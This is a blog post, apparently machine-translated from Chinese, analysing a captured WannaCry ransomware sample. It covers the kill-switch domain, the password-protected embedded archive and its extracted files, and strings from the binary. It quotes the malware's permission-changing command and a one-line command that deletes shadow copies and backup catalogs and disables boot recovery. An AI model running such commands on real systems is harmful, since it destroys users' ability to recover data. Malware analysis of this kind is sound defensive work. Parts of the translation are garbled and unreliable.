Current location: home page > Industry trends >Text content

Wannacry virus cracking and Analysis-1

Dazzle Yi Four years ago (2017-05-14) Industry trends two thousand seven hundred and twenty-seven

 Wannacry virus cracking and analysis - 1 industry trends page 1

See the recent uproar of campus network encryption blackmail virus, I am also curious.

Fortunately, today's students risked all kinds of risks to catch a live one for research.

Here's how to "dissect" the virus and what's interesting.

After the sample is started, the following domain names will be requested first:
HT harmony tp://
Encryption is not performed until the request fails; otherwise, further encryption is discarded and exit directly.
The domain name has been identified in the early days of the virus outbreak security Department takeover.
So in view of the blackmail Software You need to connect the above secret switch domain name to stop encryption. Therefore, if the server does not have access to the intranet, it is not necessary for the machine to access the intranet.

Wncry blackmail worm can recover some files View links ? or "foremost" on the cosine microblog.

First of all, I installed Sandboxie under windows and operated in it. Sandbox can isolate the virus from the outside world and avoid damaging my system (the virus does not appear to have anti sandbox capabilities at the moment). Although I'm not a novice, I should not miss, so I didn't toss virus in the virtual machine, but after all, streaking is not good, so I used sandbox.

 Wannacry virus cracking and analysis - 1 industry trends page 2

According to the routine, I first used resourcehacker to analyze the resource file of the virus, and a large part with the content beginning with "PK" attracted my attention. As a rule of thumb, this is a compressed package. After exporting it, it should be the source file.

 Wannacry virus cracking and analysis - 1 industry trends page 3

Then I tried to decompress it and, as expected, needed a password. So I went back to * Nix and used strings to export all the strings in the program. After a simple analysis, we can find that there are some very attractive strings, which should be the string list of the program. The content is very interesting:

//These are encryption services used by viruses. The virus uses the industry standard and the recognized security encryption, basically can't crack.
Microsoft Enhanced RSA and AES Cryptographic Provider
//Commands executed by virus
cmd.exe /c "%s"
//It seems to be bitcoin?
//Virus mutex, registration, scheduling tasks, etc
//Virus removes all permissions on the current directory and subfolders
icacls . /grant Everyone:F /T /C /Q
//Virus hides current folder
attrib +h .
//Ha ha, this is not a password. What is it


 Wannacry virus cracking and analysis - 1 industry trends page 4

After entering the password and decompressing, there are the following files and folders:

MSG \ / / a directory containing explanations in 28 languages. It is speculated that it is written in word and saved in RTF format. I read English and Chinese, the typesetting is neat, the translation quality is very high, and the Chinese level is slightly higher than English, and more malicious. If the author of the virus is not Chinese, it is not malicious to China.

 Wannacry virus cracking and analysis - 1 industry trends page 5

 Wannacry virus cracking and analysis - 1 industry trends page 6

 Wannacry virus cracking and analysis - 1 industry trends page 7

 Wannacry virus cracking and analysis - 1 industry trends page 8

 Wannacry virus cracking and analysis - 1 industry trends page 9

b. Wnry / / image in virus
c. Wnry / / there is a pile of. Onion words in it, which is supposed to be the configuration used by tor. There is also a download link for tor.
r. Wnry / / dialog contents
s. Wnry / / a complete compressed package of tor program
t. Wnry / / current use unknown
Taskdl.exe / / a simple program, whose purpose is unknown at present. It seems that it is written entirely in C + + library
Taskse.exe / / a simple program, whose purpose is unknown at present, but because it uses wtsapi32.dll, it may be related to remote desktop control
u. Wnry / / the released main program has not been analyzed carefully. But there is a command (after collation) that is striking:

cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

 Wannacry virus cracking and analysis - 1 industry trends page 10

This command is used to shut down and delete all user backup services, prevent recovery from starting, and prevent display of system errors caused by these operations. So recovery and local backup are likely to be ineffective.

A few words about tor. Tor (the Onion Router) is a free software for anonymous communication. Tor is an implementation of the second generation onion routing, through which users can communicate anonymously on the Internet. Initially, the project was sponsored by the U.S. Naval Research Laboratory. In late 2004, tor became a project of the electronic outpost Foundation (EFF). In late 2005, eff no longer sponsored tor, but they continued to maintain tor's official website. Tor is used to prevent the traffic filtering and sniffing analysis which widely exist on the Internet. Tor communicates on the overlay network composed of onion routing, which can realize anonymous external connection and anonymous hiding service.

In short, through tor, hackers can remotely control the behavior of the virus anonymously.

Bitcoin is a decentralized (not dominated by any banks and institutions, maintaining integrity with security protocols and mathematical proof) anonymous electronic currency, which can realize anonymous payment to avoid revealing identity.

Come here first.



Welcome to participate in the discussion. Please express your views and exchange your views here.
Call for istwar